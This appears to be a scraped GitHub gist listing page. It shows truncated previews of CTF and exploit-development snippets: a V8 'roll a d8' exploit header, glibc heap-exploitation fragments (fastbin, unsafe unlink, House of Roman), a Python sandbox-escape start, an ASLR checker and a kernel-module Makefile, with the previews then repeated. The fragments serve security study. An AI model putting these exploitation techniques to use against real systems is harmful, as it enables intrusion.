Duc Phan ducphanduyagentp

## pwn.js
//
// Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018.
// N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d
//
// Scroll down do "BEGIN EXPLOIT" to skip the utility functions.
//
// Copyright (c) 2018 Samuel Groß
//

//

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                ducphanduyagentp
                / keybase.md
            
            
              Created
              January 7, 2019 08:01
            
          
    Keybase proof

I hereby claim:

I am ducphanduyagentp on github.
I am dphan0x80 (https://keybase.io/dphan0x80) on keybase.
I have a public key whose fingerprint is 3796 106E F244 F6C6 EE39  09B3 07A6 7A8D 5C67 96C2

To claim this, I am signing this object:

  
## fastbin.c
#include <stdio.h>
#include <stdlib.h>

#define chunksize 0x8
#define fakesize 0x20

#define SIZE_SZ (sizeof(size_t))
#define MALLOC_ALIGN_MASK (2*SIZE_SZ - 1)
#define MIN_CHUNK_SIZE 24 /* 64 bit system */
//#define MIN_CHUNK_SIZE 12 /* 32 bit system */

## gist:5ca684664ab979e2660a0302806edce9
#!/usr/bin/env python
#-*- coding: utf-8 -*-

from pwn import *
import re
import sys
import string
import itertools

# UAF in IndexCursor

## exp.py
# import Collection
bytearray = ().__class__.__base__.__subclasses__()[5]

def p64(addr):
    x = '{0:016x}'.format(addr)
    return bytearray.fromhex(x)[::-1]


b = Collection.Collection({'1':0x1337})
libc_base = id(b) + 0xe27198 - 0x13e0dd0

## 300.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-

# The 300 challenge was a heap challenge that allowed you to make allocations of size 0x300.
# You could free allocations and read/write to them even after they got freed.
# The tricky part about the challenge was that you don't control the size and can't for example use the usual fastbin techniques.

# This exploit overwrites the check_action variable so that the libc doesn't abort on errors anymore.
# Afterwards we can get a write-what-where primitive using unsafe unlink.

## checkaslr.py
'''checkaslr.py: Check for files that opt into ASLR with /DYNAMICBASE,
but do not have a relocation table to allow ASLR to function.

usage: checkaslr.py <dir>
ex: checkaslr.py "C:\Program Files\"

requires: pefile <https://github.com/erocarrera/pefile>, which should be
installable via: pip install pefile
'''

## House_of_Roman.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                ducphanduyagentp
                / House_of_Roman.md
            
            
              Created
              May 1, 2018 18:01
                — forked from romanking98/House_of_Roman.md
            
          
    Table of Contents


Disclamair
House Of Roman

------> 2.1 Assumptions

------> 2.2 Protections

------> 2.3 Quick Walkthrough

------> 2.4 Setting the FD to malloc_hook

------> 2.5 Fixing the 0x71 freelist

------> 2.6 Unsorted Bin attack on malloc_hook


## Makefile
obj-m += afw.o
afw-objs := afw_main.o locate_sct.o ttgl.o

ccflags-y := -std=gnu99 -O2

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

## Crack.pattern.py
#!/usr/bin/env python
#
# Copyright (c) 2012, Chema Garcia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# * Redistributions of source code must retain the above
	//
	// Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018.
	// N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d
	//
	// Scroll down do "BEGIN EXPLOIT" to skip the utility functions.
	//
	// Copyright (c) 2018 Samuel Groß
	//

	//
	#include <stdio.h>
	#include <stdlib.h>

	#define chunksize 0x8
	#define fakesize 0x20

	#define SIZE_SZ (sizeof(size_t))
	#define MALLOC_ALIGN_MASK (2*SIZE_SZ - 1)
	#define MIN_CHUNK_SIZE 24 /* 64 bit system */
	//#define MIN_CHUNK_SIZE 12 /* 32 bit system */
	#!/usr/bin/env python
	#-- coding: utf-8 --

	from pwn import *
	import re
	import sys
	import string
	import itertools

	# UAF in IndexCursor
	# import Collection
	bytearray = ().__class__.__base__.__subclasses__()[5]

	def p64(addr):
	x = '{0:016x}'.format(addr)
	return bytearray.fromhex(x)[::-1]


	b = Collection.Collection({'1':0x1337})
	libc_base = id(b) + 0xe27198 - 0x13e0dd0
	#!/usr/bin/env python2
	# -- coding: utf-8 --

	# The 300 challenge was a heap challenge that allowed you to make allocations of size 0x300.
	# You could free allocations and read/write to them even after they got freed.
	# The tricky part about the challenge was that you don't control the size and can't for example use the usual fastbin techniques.

	# This exploit overwrites the check_action variable so that the libc doesn't abort on errors anymore.
	# Afterwards we can get a write-what-where primitive using unsafe unlink.
	'''checkaslr.py: Check for files that opt into ASLR with /DYNAMICBASE,
	but do not have a relocation table to allow ASLR to function.

	usage: checkaslr.py <dir>
	ex: checkaslr.py "C:\Program Files\"

	requires: pefile <https://github.com/erocarrera/pefile>, which should be
	installable via: pip install pefile
	'''
	obj-m += afw.o
	afw-objs := afw_main.o locate_sct.o ttgl.o

	ccflags-y := -std=gnu99 -O2

	all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

	clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
	#!/usr/bin/env python
	#
	# Copyright (c) 2012, Chema Garcia
	# All rights reserved.
	#
	# Redistribution and use in source and binary forms, with or
	# without modification, are permitted provided that the following
	# conditions are met:
	#
	# * Redistributions of source code must retain the above